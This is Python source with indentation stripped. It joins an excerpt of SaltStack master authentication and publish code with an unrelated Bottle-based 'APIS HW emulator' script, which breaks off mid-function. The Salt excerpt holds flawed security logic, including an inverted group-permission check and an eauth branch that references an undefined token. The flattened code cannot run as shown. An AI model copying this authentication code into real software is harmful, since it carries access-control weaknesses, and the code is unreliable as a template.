for key, val in self.local.get_cache_returns(ret['__jid__']).items():
if not key in ret:
ret[key] = val
if clear_load.get('form', '') != 'full':
ret.pop('__jid__')
return ret
def revoke_auth(self, load):
'''
Allow a minion to request revocation of its own key
'''
if 'id' not in load or 'tok' not in load:
return False
if not self.__verify_minion(load['id'], load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warn(
(
'Minion id {0} is not who it says it is and is attempting '
'to revoke the key for {0}'
).format(load['id'])
)
return False
keyapi = salt.key.Key(self.opts)
keyapi.delete_key(load['id'])
return True
def run_func(self, func, load):
'''
Wrapper for running functions executed with AES encryption
'''
# Don't honor private functions
if func.startswith('__'):
return self.crypticle.dumps({})
# Run the func
if hasattr(self, func):
try:
ret = getattr(self, func)(load)
except Exception:
ret = ''
log.error(
'Error in function {0}:\n'.format(func),
exc_info=True
)
else:
log.error(
'Received function {0} which is unavailable on the master, '
'returning False'.format(
func
)
)
return self.crypticle.dumps(False)
# Don't encrypt the return value for the _return func
# (we don't care about the return value, so why encrypt it?)
if func == '_return':
return ret
if func == '_pillar' and 'id' in load:
if load.get('ver') != '2' and self.opts['pillar_version'] == 1:
# Authorized to return old pillar proto
return self.crypticle.dumps(ret)
# encrypt with a specific AES key
pubfn = os.path.join(self.opts['pki_dir'],
'minions',
load['id'])
key = salt.crypt.Crypticle.generate_key_string()
pcrypt = salt.crypt.Crypticle(
self.opts,
key)
try:
pub = RSA.load_pub_key(pubfn)
except RSA.RSAError:
return self.crypticle.dumps({})
pret = {}
pret['key'] = pub.public_encrypt(key, 4)
pret['pillar'] = pcrypt.dumps(ret)
return pret
# AES Encrypt the return
return self.crypticle.dumps(ret)
class ClearFuncs(object):
'''
Set up functions that are safe to execute when commands sent to the master
without encryption and authentication
'''
# The ClearFuncs object encapsulates the functions that can be executed in
# the clear:
# publish (The publish from the LocalClient)
# _auth
def __init__(self, opts, key, master_key, crypticle):
self.opts = opts
self.serial = salt.payload.Serial(opts)
self.key = key
self.master_key = master_key
self.crypticle = crypticle
# Create the event manager
self.event = salt.utils.event.MasterEvent(self.opts['sock_dir'])
# Make a client
self.local = salt.client.LocalClient(self.opts['conf_file'])
# Make an minion checker object
self.ckminions = salt.utils.minions.CkMinions(opts)
# Make an Auth object
self.loadauth = salt.auth.LoadAuth(opts)
# Stand up the master Minion to access returner data
self.mminion = salt.minion.MasterMinion(
self.opts,
states=False,
rend=False)
# Make a wheel object
self.wheel_ = salt.wheel.Wheel(opts)
def _send_cluster(self):
'''
Send the cluster data out
'''
log.debug('Sending out cluster data')
ret = self.local.cmd(self.opts['cluster_masters'],
'cluster.distrib',
self._cluster_load(),
0,
'list'
)
log.debug('Cluster distributed: {0}'.format(ret))
def _cluster_load(self):
'''
Generates the data sent to the cluster nodes.
'''
minions = {}
master_pem = ''
with salt.utils.fopen(self.opts['conf_file'], 'r') as fp_:
master_conf = fp_.read()
minion_dir = os.path.join(self.opts['pki_dir'], 'minions')
for host in os.listdir(minion_dir):
pub = os.path.join(minion_dir, host)
minions[host] = salt.utils.fopen(pub, 'r').read()
if self.opts['cluster_mode'] == 'full':
master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
with salt.utils.fopen(master_pem_path) as fp_:
master_pem = fp_.read()
return [minions,
master_conf,
master_pem,
self.opts['conf_file']]
def _check_permissions(self, filename):
'''
Check if the specified filename has correct permissions
'''
if salt.utils.is_windows():
return True
# After we've ascertained we're not on windows
import grp
try:
user = self.opts['user']
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
except KeyError:
log.error(
'Failed to determine groups for user {0}. The user is not '
'available.\n'.format(
user
)
)
return False
fmode = os.stat(filename)
if os.getuid() == 0:
if fmode.st_uid == uid or fmode.st_gid != gid:
return True
elif self.opts.get('permissive_pki_access', False) \
and fmode.st_gid in groups:
return True
else:
if stat.S_IWOTH & fmode.st_mode:
# don't allow others to write to the file
return False
# check group flags
if self.opts.get('permissive_pki_access', False) \
and stat.S_IWGRP & fmode.st_mode:
return True
elif stat.S_IWGRP & fmode.st_mode:
return False
# check if writable by group or other
if not (stat.S_IWGRP & fmode.st_mode or
stat.S_IWOTH & fmode.st_mode):
return True
return False
def _check_autosign(self, keyid):
'''
Checks if the specified keyid should automatically be signed.
'''
if self.opts['auto_accept']:
return True
autosign_file = self.opts.get('autosign_file', None)
if not autosign_file or not os.path.exists(autosign_file):
return False
if not self._check_permissions(autosign_file):
message = 'Wrong permissions for {0}, ignoring content'
log.warn(message.format(autosign_file))
return False
with salt.utils.fopen(autosign_file, 'r') as fp_:
for line in fp_:
line = line.strip()
if line.startswith('#'):
continue
if line == keyid:
return True
if fnmatch.fnmatch(keyid, line):
return True
try:
if re.match(r'\A{0}\Z'.format(line), keyid):
return True
except re.error:
log.warn(
'{0} is not a valid regular expression, ignoring line '
'in {1}'.format(
line, autosign_file
)
)
continue
return False
def _auth(self, load):
'''
Authenticate the client, use the sent public key to encrypt the AES key
which was generated at start up.
This method fires an event over the master event manager. The event is
tagged "auth" and returns a dict with information about the auth
event
'''
# 0. Check for max open files
# 1. Verify that the key we are receiving matches the stored key
# 2. Store the key if it is not there
# 3. make an RSA key with the pub key
# 4. encrypt the AES key as an encrypted salt.payload
# 5. package the return and return it
salt.utils.verify.check_max_open_files(self.opts)
if not salt.utils.verify.valid_id(self.opts, load['id']):
log.info(
'Authentication request from invalid id {id}'.format(**load)
)
return {'enc': 'clear',
'load': {'ret': False}}
log.info('Authentication request from {id}'.format(**load))
pubfn = os.path.join(self.opts['pki_dir'],
'minions',
load['id'])
pubfn_pend = os.path.join(self.opts['pki_dir'],
'minions_pre',
load['id'])
pubfn_rejected = os.path.join(self.opts['pki_dir'],
'minions_rejected',
load['id'])
if self.opts['open_mode']:
# open mode is turned on, nuts to checks and overwrite whatever
# is there
pass
elif os.path.isfile(pubfn_rejected):
# The key has been rejected, don't place it in pending
log.info('Public key rejected for {id}'.format(**load))
ret = {'enc': 'clear',
'load': {'ret': False}}
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix = 'auth'))
return ret
elif os.path.isfile(pubfn):
# The key has been accepted check it
if salt.utils.fopen(pubfn, 'r').read() != load['pub']:
log.error(
'Authentication attempt from {id} failed, the public '
'keys did not match. This may be an attempt to compromise '
'the Salt cluster.'.format(**load)
)
ret = {'enc': 'clear',
'load': {'ret': False}}
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix = 'auth'))
return ret
elif not os.path.isfile(pubfn_pend)\
and not self._check_autosign(load['id']):
if os.path.isdir(pubfn_pend):
# The key path is a directory, error out
log.info(
'New public key id is a directory {id}'.format(**load)
)
ret = {'enc': 'clear',
'load': {'ret': False}}
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix = 'auth'))
return ret
# This is a new key, stick it in pre
log.info(
'New public key placed in pending for {id}'.format(**load)
)
with salt.utils.fopen(pubfn_pend, 'w+') as fp_:
fp_.write(load['pub'])
ret = {'enc': 'clear',
'load': {'ret': True}}
eload = {'result': True,
'act': 'pend',
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix = 'auth'))
return ret
elif os.path.isfile(pubfn_pend)\
and not self._check_autosign(load['id']):
# This key is in pending, if it is the same key ret True, else
# ret False
if salt.utils.fopen(pubfn_pend, 'r').read() != load['pub']:
log.error(
'Authentication attempt from {id} failed, the public '
'keys in pending did not match. This may be an attempt to '
'compromise the Salt cluster.'.format(**load)
)
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix = 'auth'))
return {'enc': 'clear',
'load': {'ret': False}}
else:
log.info(
'Authentication failed from host {id}, the key is in '
'pending and needs to be accepted with salt-key '
'-a {id}'.format(**load)
)
eload = {'result': True,
'act': 'pend',
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix = 'auth'))
return {'enc': 'clear',
'load': {'ret': True}}
elif os.path.isfile(pubfn_pend)\
and self._check_autosign(load['id']):
# This key is in pending, if it is the same key auto accept it
if salt.utils.fopen(pubfn_pend, 'r').read() != load['pub']:
log.error(
'Authentication attempt from {id} failed, the public '
'keys in pending did not match. This may be an attempt to '
'compromise the Salt cluster.'.format(**load)
)
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix = 'auth'))
return {'enc': 'clear',
'load': {'ret': False}}
else:
pass
elif not os.path.isfile(pubfn_pend)\
and self._check_autosign(load['id']):
# This is a new key and it should be automatically be accepted
pass
else:
# Something happened that I have not accounted for, FAIL!
log.warn('Unaccounted for authentication failure')
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix = 'auth'))
return {'enc': 'clear',
'load': {'ret': False}}
log.info('Authentication accepted from {id}'.format(**load))
with salt.utils.fopen(pubfn, 'w+') as fp_:
fp_.write(load['pub'])
pub = None
# The key payload may sometimes be corrupt when using auto-accept
# and an empty request comes in
try:
pub = RSA.load_pub_key(pubfn)
except RSA.RSAError as err:
log.error('Corrupt public key "{0}": {1}'.format(pubfn, err))
return {'enc': 'clear',
'load': {'ret': False}}
ret = {'enc': 'pub',
'pub_key': self.master_key.get_pub_str(),
'publish_port': self.opts['publish_port'],
}
if self.opts['auth_mode'] >= 2:
if 'token' in load:
try:
mtoken = self.master_key.key.private_decrypt(load['token'], 4)
aes = '{0}_|-{1}'.format(self.opts['aes'], mtoken)
except Exception:
# Token failed to decrypt, send back the salty bacon to
# support older minions
pass
else:
aes = self.opts['aes']
ret['aes'] = pub.public_encrypt(aes, 4)
else:
if 'token' in load:
try:
mtoken = self.master_key.key.private_decrypt(
load['token'], 4
)
ret['token'] = pub.public_encrypt(mtoken, 4)
except Exception:
# Token failed to decrypt, send back the salty bacon to
# support older minions
pass
aes = self.opts['aes']
ret['aes'] = pub.public_encrypt(self.opts['aes'], 4)
# Be aggressive about the signature
digest = hashlib.sha256(aes).hexdigest()
ret['sig'] = self.master_key.key.private_encrypt(digest, 5)
eload = {'result': True,
'act': 'accept',
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix = 'auth'))
return ret
def runner(self, clear_load):
'''
Send a master control function back to the wheel system
'''
# All wheel ops pass through eauth
if 'token' in clear_load:
try:
token = self.loadauth.get_tok(clear_load['token'])
except Exception as exc:
log.error(
'Exception occurred when generating auth token: {0}'.format(
exc
)
)
return ''
if not token:
log.warning('Authentication failure of type "token" occurred.')
return ''
if token['eauth'] not in self.opts['external_auth']:
log.warning('Authentication failure of type "token" occurred.')
return ''
if token['name'] not in self.opts['external_auth'][token['eauth']]:
log.warning('Authentication failure of type "token" occurred.')
return ''
good = self.ckminions.runner_check(
self.opts['external_auth'][token['eauth']][token['name']] if token['name'] in self.opts['external_auth'][token['eauth']] else self.opts['external_auth'][token['eauth']]['*'],
clear_load['fun'])
if not good:
msg = ('Authentication failure of type "token" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return ''
try:
fun = clear_load.pop('fun')
runner_client = salt.runner.RunnerClient(self.opts)
return runner_client.async(fun, clear_load.get('kwarg', {}))
except Exception as exc:
log.error('Exception occurred while '
'introspecting {0}: {1}'.format(fun, exc))
return ''
if 'eauth' not in clear_load:
msg = ('Authentication failure of type "eauth" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return ''
if clear_load['eauth'] not in self.opts['external_auth']:
# The eauth system is not enabled, fail
msg = ('Authentication failure of type "eauth" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return ''
try:
name = self.loadauth.load_name(clear_load)
if not ((name in self.opts['external_auth'][clear_load['eauth']]) | ('*' in self.opts['external_auth'][clear_load['eauth']])):
msg = ('Authentication failure of type "eauth" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return ''
if not self.loadauth.time_auth(clear_load):
msg = ('Authentication failure of type "eauth" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return ''
good = self.ckminions.runner_check(
self.opts['external_auth'][clear_load['eauth']][name] if name in self.opts['external_auth'][clear_load['eauth']] else self.opts['external_auth'][clear_load['eauth']]['*'],
clear_load['fun'])
if not good:
msg = ('Authentication failure of type "eauth" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return ''
try:
fun = clear_load.pop('fun')
runner_client = salt.runner.RunnerClient(self.opts)
return runner_client.async(fun, clear_load.get('kwarg', {}))
except Exception as exc:
log.error('Exception occurred while '
'introspecting {0}: {1}'.format(fun, exc))
return ''
except Exception as exc:
log.error(
'Exception occurred in the wheel system: {0}'.format(exc)
)
return ''
def wheel(self, clear_load):
'''
Send a master control function back to the wheel system
'''
# All wheel ops pass through eauth
if 'token' in clear_load:
try:
token = self.loadauth.get_tok(clear_load['token'])
except Exception as exc:
log.error(
'Exception occurred when generating auth token: {0}'.format(
exc
)
)
return ''
if not token:
log.warning('Authentication failure of type "token" occurred.')
return ''
if token['eauth'] not in self.opts['external_auth']:
log.warning('Authentication failure of type "token" occurred.')
return ''
if token['name'] not in self.opts['external_auth'][token['eauth']]:
log.warning('Authentication failure of type "token" occurred.')
return ''
good = self.ckminions.wheel_check(
self.opts['external_auth'][token['eauth']][token['name']] if token['name'] in self.opts['external_auth'][token['eauth']] else self.opts['external_auth'][token['eauth']]['*'],
clear_load['fun'])
if not good:
msg = ('Authentication failure of type "token" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return ''
try:
fun = clear_load.pop('fun')
return self.wheel_.call_func(fun, **clear_load.get('kwarg', {}))
except Exception as exc:
log.error('Exception occurred while '
'introspecting {0}: {1}'.format(fun, exc))
return ''
if 'eauth' not in clear_load:
msg = ('Authentication failure of type "eauth" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return ''
if clear_load['eauth'] not in self.opts['external_auth']:
# The eauth system is not enabled, fail
msg = ('Authentication failure of type "eauth" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return ''
try:
name = self.loadauth.load_name(clear_load)
if not ((name in self.opts['external_auth'][clear_load['eauth']]) | ('*' in self.opts['external_auth'][clear_load['eauth']])):
msg = ('Authentication failure of type "eauth" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return ''
if not self.loadauth.time_auth(clear_load):
msg = ('Authentication failure of type "eauth" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return ''
good = self.ckminions.wheel_check(
self.opts['external_auth'][clear_load['eauth']][name] if name in self.opts['external_auth'][clear_load['eauth']] else self.opts['external_auth'][token['eauth']]['*'],
clear_load['fun'])
if not good:
msg = ('Authentication failure of type "eauth" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return ''
try:
fun = clear_load.pop('fun')
return self.wheel_.call_func(fun, **clear_load.get('kwarg', {}))
except Exception as exc:
log.error('Exception occurred while '
'introspecting {0}: {1}'.format(fun, exc))
return ''
except Exception as exc:
log.error(
'Exception occurred in the wheel system: {0}'.format(exc)
)
return ''
def mk_token(self, clear_load):
'''
Create and return an authentication token, the clear load needs to
contain the eauth key and the needed authentication creds.
'''
if 'eauth' not in clear_load:
log.warning('Authentication failure of type "eauth" occurred.')
return ''
if clear_load['eauth'] not in self.opts['external_auth']:
# The eauth system is not enabled, fail
log.warning('Authentication failure of type "eauth" occurred.')
return ''
try:
name = self.loadauth.load_name(clear_load)
if not ((name in self.opts['external_auth'][clear_load['eauth']]) | ('*' in self.opts['external_auth'][clear_load['eauth']])):
log.warning('Authentication failure of type "eauth" occurred.')
return ''
if not self.loadauth.time_auth(clear_load):
log.warning('Authentication failure of type "eauth" occurred.')
return ''
return self.loadauth.mk_token(clear_load)
except Exception as exc:
log.error(
'Exception occurred while authenticating: {0}'.format(exc)
)
return ''
def get_token(self, clear_load):
'''
Return the name associated with a token or False if the token is invalid
'''
if 'token' not in clear_load:
return False
return self.loadauth.get_tok(clear_load['token'])
def publish(self, clear_load):
'''
This method sends out publications to the minions, it can only be used
by the LocalClient.
'''
extra = clear_load.get('kwargs', {})
# check blacklist/whitelist
good = True
# Check if the user is blacklisted
for user_re in self.opts['client_acl_blacklist'].get('users', []):
if re.match(user_re, clear_load['user']):
good = False
break
# check if the cmd is blacklisted
for module_re in self.opts['client_acl_blacklist'].get('modules', []):
if re.match(module_re, clear_load['fun']):
good = False
break
if good is False:
log.error(
'{user} does not have permissions to run {function}. Please '
'contact your local administrator if you believe this is in '
'error.\n'.format(
user=clear_load['user'],
function=clear_load['fun']
)
)
return ''
# to make sure we don't step on anyone else's toes
del good
# Check for external auth calls
if extra.get('token', False):
# A token was passed, check it
try:
token = self.loadauth.get_tok(extra['token'])
except Exception as exc:
log.error(
'Exception occurred when generating auth token: {0}'.format(
exc
)
)
return ''
if not token:
log.warning('Authentication failure of type "token" occurred.')
return ''
if token['eauth'] not in self.opts['external_auth']:
log.warning('Authentication failure of type "token" occurred.')
return ''
if not ((token['name'] in self.opts['external_auth'][token['eauth']]) | ('*' in self.opts['external_auth'][token['eauth']])):
log.warning('Authentication failure of type "token" occurred.')
return ''
good = self.ckminions.auth_check(
self.opts['external_auth'][token['eauth']][token['name']] if token['name'] in self.opts['external_auth'][token['eauth']] else self.opts['external_auth'][token['eauth']]['*'],
clear_load['fun'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'))
if not good:
# Accept find_job so the CLI will function cleanly
if clear_load['fun'] != 'saltutil.find_job':
log.warning(
'Authentication failure of type "token" occurred.'
)
return ''
elif 'eauth' in extra:
if extra['eauth'] not in self.opts['external_auth']:
# The eauth system is not enabled, fail
log.warning(
'Authentication failure of type "eauth" occurred.'
)
return ''
try:
name = self.loadauth.load_name(extra)
if not ((name in self.opts['external_auth'][extra['eauth']]) | ('*' in self.opts['external_auth'][extra['eauth']])):
log.warning(
'Authentication failure of type "eauth" occurred.'
)
return ''
if not self.loadauth.time_auth(extra):
log.warning(
'Authentication failure of type "eauth" occurred.'
)
return ''
except Exception as exc:
log.error(
'Exception occurred while authenticating: {0}'.format(exc)
)
return ''
good = self.ckminions.auth_check(
self.opts['external_auth'][extra['eauth']][name] if name in self.opts['external_auth'][extra['eauth']] else self.opts['external_auth'][extra['eauth']]['*'],
clear_load['fun'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'))
if not good:
# Accept find_job so the CLI will function cleanly
if clear_load['fun'] != 'saltutil.find_job':
log.warning(
'Authentication failure of type "eauth" occurred.'
)
return ''
# Verify that the caller has root on master
elif 'user' in clear_load:
if clear_load['user'].startswith('sudo_'):
# If someone can sudo, allow them to act as root
if clear_load.get('key', 'invalid') == self.key.get('root'):
clear_load.pop('key')
elif clear_load.pop('key') != self.key[self.opts.get('user', 'root')]:
log.warning(
'Authentication failure of type "user" occurred.'
)
return ''
elif clear_load['user'] == self.opts.get('user', 'root'):
if clear_load.pop('key') != self.key[self.opts.get('user', 'root')]:
log.warning(
'Authentication failure of type "user" occurred.'
)
return ''
elif clear_load['user'] == 'root':
if clear_load.pop('key') != self.key.get(self.opts.get('user', 'root')):
log.warning(
'Authentication failure of type "user" occurred.'
)
return ''
elif clear_load['user'] == getpass.getuser():
if clear_load.pop('key') != self.key.get(clear_load['user']):
log.warning(
'Authentication failure of type "user" occurred.'
)
return ''
else:
if clear_load['user'] in self.key:
# User is authorised, check key and check perms
if clear_load.pop('key') != self.key[clear_load['user']]:
log.warning(
'Authentication failure of type "user" occurred.'
)
return ''
if clear_load['user'] not in self.opts['client_acl']:
log.warning(
'Authentication failure of type "user" occurred.'
)
return ''
good = self.ckminions.auth_check(
self.opts['client_acl'][clear_load['user']],
clear_load['fun'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'))
if not good:
# Accept find_job so the CLI will function cleanly
if clear_load['fun'] != 'saltutil.find_job':
log.warning(
'Authentication failure of type "user" '
'occurred.'
)
return ''
else:
log.warning(
'Authentication failure of type "user" occurred.'
)
return ''
else:
if clear_load.pop('key') != self.key[getpass.getuser()]:
log.warning(
'Authentication failure of type "other" occurred.'
)
return ''
# Retrieve the minions list
minions = self.ckminions.check_minions(
clear_load['tgt'],
clear_load.get('tgt_type', 'glob')
)
# If we order masters (via a syndic), don't short circuit if no minions
# are found
if not self.opts.get('order_masters'):
# Check for no minions
if not minions:
return {
'enc': 'clear',
'load': {
'jid': None,
'minions': minions
}
}
# Retrieve the jid
if not clear_load['jid']:
clear_load['jid'] = salt.utils.prep_jid(
self.opts['cachedir'],
self.opts['hash_type'],
extra.get('nocache', False)
)
self.event.fire_event({'minions': minions}, clear_load['jid'])
jid_dir = salt.utils.jid_dir(
clear_load['jid'],
self.opts['cachedir'],
self.opts['hash_type']
)
new_job_load = {
'jid': clear_load['jid'],
'tgt_type':clear_load['tgt_type'],
'tgt': clear_load['tgt'],
'ret': clear_load['ret'],
'user': clear_load['user'],
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'minions': minions,
}
# Announce the job on the event bus
self.event.fire_event(new_job_load, 'new_job') # old dup event
self.event.fire_event(new_job_load, tagify([clear_load['jid'], 'new'], 'job'))
# Verify the jid dir
if not os.path.isdir(jid_dir):
os.makedirs(jid_dir)
# Save the invocation information
self.serial.dump(
clear_load,
salt.utils.fopen(os.path.join(jid_dir, '.load.p'), 'w+')
)
if self.opts['ext_job_cache']:
try:
fstr = '{0}.save_load'.format(self.opts['ext_job_cache'])
self.mminion.returners[fstr](clear_load['jid'], clear_load)
except KeyError:
log.critical(
'The specified returner used for the external job cache '
'"{0}" does not have a save_load function!'.format(
self.opts['ext_job_cache']
)
)
except Exception:
log.critical(
'The specified returner threw a stack trace:\n',
exc_info=True
)
# Set up the payload
payload = {'enc': 'aes'}
# Altering the contents of the publish load is serious!! Changes here
# break compatibility with minion/master versions and even tiny
# additions can have serious implications on the performance of the
# publish commands.
#
# In short, check with Thomas Hatch before you even think about
# touching this stuff, we can probably do what you want to do another
# way that won't have a negative impact.
load = {
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'tgt': clear_load['tgt'],
'jid': clear_load['jid'],
'ret': clear_load['ret'],
}
if 'id' in extra:
load['id'] = extra['id']
if 'tgt_type' in clear_load:
load['tgt_type'] = clear_load['tgt_type']
if 'to' in clear_load:
load['to'] = clear_load['to']
if 'user' in clear_load:
log.info(
'User {user} Published command {fun} with jid {jid}'.format(
**clear_load
)
)
load['user'] = clear_load['user']
else:
log.info(
'Published command {fun} with jid {jid}'.format(
**clear_load
)
)
log.debug('Published command details {0}'.format(load))
payload['load'] = self.crypticle.dumps(load)
# Send 0MQ to the publisher
context = zmq.Context(1)
pub_sock = context.socket(zmq.PUSH)
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
pub_sock.connect(pull_uri)
pub_sock.send(self.serial.dumps(payload))
return {
'enc': 'clear',
'load': {
'jid': clear_load['jid'],
'minions': minions
}
}
|
startEmul.py | #!/usr/bin/env python
'''
Created on Aug 3, 2015
@author: annette
'''
import json, time, threading, logging.config, sys
from bottle import route, run, template, static_file, request, response
from tools import helper
import core as core
import global_var as gl
import config as conf
from inputData import inputDataManager as inputDataManager
@route('/')
def index():
#ipaddr = socket.gethostbyname(socket.gethostname())
ids = gl.oesunits.keys()
return template('log',
admintext="APIS HW emulator",
title="APIS HW emulator",
#ip= ipaddr,
ids=sorted(ids)
)
@route('/restart')
def getInitJsonFile():
while gl.sema:
time.sleep(0.01)
gl.sema=True
with open("jsontmp/fakeResponse.json") as json_init_file:
gl.oesunits = json.load(json_init_file)
for i in gl.oesunits:
gl.oesunits[i]["oesunit"]["display"]=gl.displayNames[i]
gl.is_ACCharging[i] = False
gl.is_bypassMode[i] = False
gl.acloss[i] = 0
gl.dcloss[i] = 0
gl.wasted[i] = 0
#logger.debug(oesunits)
gl.sema=False
return gl.oesunits
@route('/add/unit')
def addUnit():
while gl.sema :
time.sleep(0.01)
gl.sema=True
with open("jsontmp/standard.json") as json_unit_file:
oesunits_add_unit = json.load(json_unit_file)
add_id = "E{0:03d}".format(len(gl.oesunits)+1)
oesunits_add_unit["oesunit"]["ip"] = oesunits_add_unit["oesunit"]["ip"][:-1]+str((len(gl.oesunits)))
oesunits_add_unit["oesunit"]["display"] = gl.displayNames[add_id]
oesunits_add_unit["oesunit"]["id"] = add_id
gl.oesunits[add_id] = oesunits_add_unit
gl.is_ACCharging[add_id] = False
gl.is_bypassMode[add_id] = False
gl.acloss[add_id] = 0
gl.dcloss[add_id] = 0
gl.wasted[add_id] = 0
#logger.debug(gl.oesunits.keys())
gl.sema=False
return gl.oesunits
@route('/remove/unit')
def removeUnit():
while gl.sema :
time.sleep(0.01)
gl.sema=True
del_id = "E{0:03d}".format(len(gl.oesunits))
del gl.oesunits[del_id]
logger.debug(gl.oesunits.keys())
gl.sema=False
return gl.oesunits
@route('/get/log')
def getLog():
#logger.debug( "log request received")
response.content_type = 'application/json'
while gl.sema :
time.sleep(0.01)
return gl.oesunits
@route('/get/last')
def getLastJsonFile():
while gl.sema :
time.sleep(0.01)
gl.sema=True
with open("jsontmp/lastSave.json") as json_last_file:
gl.oesunits = json.load(json_last_file)
logger.debug(gl.oesunits)
gl.sema=False
return gl.oesunits
@route('/save')
def setJsonFile():
with open("jsontmp/lastSave.json", 'w') as json_file:
json.dump(gl.oesunits, json_file)
logger.debug(gl.oesunits)
return gl.oesunits
def convert_dict_(src, keys):
dst = {}
for k in keys:
v = src.get(k)
if v is not None:
dst[k] = v
return dst
def convert_dcdc_status_(src): return convert_dict_(src, ['status', 'alarmState', 'operationMode'])
def convert_dcdc_meter_(src): return convert_dict_(src, ['wg', 'tmp', 'vb', 'wb', 'vg', 'ib', 'ig'])
def convert_dcdc_vdis_(src): return convert_dict_(src, ['dvg', 'drg'])
def convert_dcdc_param_(src): return convert_dict_(src, ['dig'])
def convert_dcdc_(src):
dst = {}
if src.get('status') is not None: dst['status'] = convert_dcdc_status_(src['status'])
if src.get('meter') is not None: dst['meter'] = convert_dcdc_meter_(src['meter'])
if src.get('vdis') is not None: dst['vdis'] = convert_dcdc_vdis_(src['vdis'])
if src.get('param') is not None: dst['param'] = convert_dcdc_param_(src['param'])
return dst
@route('/get/unit/<oesid>')
def getRemote(oesid):
response.content_type = 'application/json'
# return gl.oesunits[oesid]
result = {}
for k, v in gl.oesunits.get(oesid, {}).items():
result[k] = convert_dcdc_(v) if k == 'dcdc' else v
return result
@route('/get/emu/<oesid>')
def getRemoteEmu(oesid):
response.content_type = 'application/json'
return gl.oesunits[oesid]["emu"]
@route('/get/dcdc/status/<oesid>')
def getDCDCStatus(oesid):
response.content_type = 'application/json'
# json={}
# json["meter"]=gl.oesunits[oesid]["dcdc"]["meter"]
# json["status"]={"runningState": gl.oesunits[oesid]["dcdc"]["status"]["runningState"],
# "operationMode": gl.oesunits[oesid]["dcdc"]["status"]["operationMode"],
# "alarmState": gl.oesunits[oesid]["dcdc"]["status"]["alarmState"]}
# return json
dcdc = gl.oesunits.get(oesid, {}).get('dcdc', {})
result = {}
if dcdc.get('status') is not None: result['status'] = convert_dcdc_status_(dcdc['status'])
if dcdc.get('meter') is not None: result['meter'] = convert_dcdc_meter_(dcdc['meter'])
return result
@route('/get/dcdc/<oesid>')
def getDCDC(oesid):
response.content_type = 'application/json'
return gl.oesunits[oesid]["dcdc"]
@route('/get/acc')
def getAcc():
return json.dumps(gl.acc)
@route('/set/acc/<newacc>')
def setAcc(newacc):
gl.acc = int(newacc)
return json.dumps(gl.acc)
@route('/set/emu/<oesid>')
def setEmu(oesid):
for key in request.query:
value=helper.convert(request.query[key])
if key in gl.oesunits[oesid]["emu"] :
gl.oesunits[oesid]["emu"][key] = float(value)
else :
return "following key not found: "+key
return gl.oesunits
@route('/set/dcdc/<oesid>', method='GET')
def setDcdc(oesid):
while gl.sema :
time.sleep(0.01)
gl.sema=True
mode = helper.convert(request.query.mode)
dig = helper.convert(request.query.dig)
dvg = helper.convert(request.query.dvg)
drg=None
if "drg" in dict(request.query):
drg = float(helper.convert(request.query.drg))
else:
drg = gl.oesunits[oesid]["dcdc"]["vdis"]["drg"]
if conf.debug :
logger.debug("setting oesunit "+oesid+ ": mode="+mode+", dig="+dig+", dvg="+dvg+", drg="+drg)
if helper.convert(request.query.p1):
p1 = helper.convert(request.query.p1)
p2 = helper.convert(request.query.p2)
gl.oesunits[oesid]["dcdc"]["powermeter"]["p1"]=float(p1)
gl.oesunits[oesid]["dcdc"]["powermeter"]["p2"]=float(p2)
if len(mode)!=6 or len(dig)<1 or len(dvg)<1:
logger.warning("incorrect request")
return None
dvg=int(float(dvg))
gl.oesunits[oesid]["dcdc"]["status"]["status"]=mode
gl.oesunits[oesid]["dcdc"]["status"]["statusName"]=conf.modes[mode]
gl.oesunits[oesid]["dcdc"]["status"]["operationMode"]=conf.modesOps[mode]
gl.oesunits[oesid]["dcdc"]["status"]["runningState"]=conf.modesRunning[mode]
gl.oesunits[oesid]["dcdc"]["vdis"]["dvg"]=float(dvg)
gl.oesunits[oesid]["dcdc"]["vdis"]["drg"]=float(drg)
gl.oesunits[oesid]["dcdc"]["param"]["dig"]=float(dig)
gl.sema=False
currentBusVoltage=int(gl.oesunits[oesid]["dcdc"]["meter"]["vg"])
# if voltage is not yet high, gradually ramp up
if mode=="0x0014" and currentBusVoltage!= dvg :
if gl.acc > 120:
